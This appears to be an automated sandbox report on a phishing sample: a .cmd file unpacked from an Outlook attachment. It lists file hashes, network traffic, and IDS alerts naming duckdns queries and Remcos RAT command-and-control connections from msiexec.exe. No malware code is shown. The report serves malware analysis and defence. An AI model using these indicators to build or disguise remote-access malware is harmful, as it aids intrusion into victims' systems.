SHA256: 52503EF8AC34B54E2C4C41E660E3FBA7497121111802441D7F54C600169F86E9

7540 | WinRAR.exe | C:\Users\admin\Desktop\00105026025_pdf.cmd | text
MD5: 98C719508191B81ACEE1F73AC8AA2861
SHA256: D441C3CD548BB3D660F7976F6731C78F9FC77CE8340D5C52DDDEA92D7A06E32D

6640 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | binary
MD5: 3039BB0F93B6AC67B53715156AD86886
SHA256: B26D29B3EFF62AFC8AFD0E9EAF407BD44C04DA421820B1342EB40DFC6710BEBB

6640 | OUTLOOK.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | binary
MD5: 624905F2280E3EEFBFFBB33691490E07
SHA256: F8170545AF8633D689EBB3910EA9D4459D705FE0322524A9BDE9C65D2320EF34

6640 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZR27YI25\00105026025_pdf.gz:Zone.Identifier | text
MD5: FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256: EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913

6640 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin | text
MD5: 552E258BC8E54A3FC22A6D610AEA8E02
SHA256: B5F3D8DED6833EE83BE838685E8E259A2387B8C282373959411B36E1105C704D

7800 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: 469861429ADC5C00C94CD2E2967D4031
SHA256: 37CC331DE30629167D52A23519075EB2DC18C8E3622A6524BC51E7500DA8E319
HTTP(S) requests
12
TCP/UDP connections
43
DNS requests
26
Threats
6

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation (- = empty on the page; the Type and Size columns are empty for every row)
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
- | - | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
- | - | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
2104 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
6640 | OUTLOOK.EXE | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
6640 | OUTLOOK.EXE | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D | unknown | whitelisted
7264 | msiexec.exe | GET | 200 | 2.19.105.127:80 | http://x1.c.lencr.org/ | unknown | whitelisted
7600 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation (- = empty on the page)
- | - | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5496 | MoUsoCoreWorker.exe | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
- | - | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
2104 | svchost.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5496 | MoUsoCoreWorker.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
6640 | OUTLOOK.EXE | 52.123.128.14:443 | ecs.office.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
6640 | OUTLOOK.EXE | 52.109.68.129:443 | roaming.officeapps.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 142.250.186.110
whitelisted
crl.microsoft.com
  • 23.53.40.176
  • 23.53.40.178
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
ecs.office.com
  • 52.123.128.14
  • 52.123.129.14
whitelisted
roaming.officeapps.live.com
  • 52.109.68.129
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
omex.cdn.office.net
  • 23.48.23.42
  • 23.48.23.11
  • 23.48.23.18
  • 23.48.23.30
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.4
whitelisted

Threats

PID | Process | Class | Message
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
7264 | msiexec.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
7264 | msiexec.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection
7264 | msiexec.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
7264 | msiexec.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection
No debug info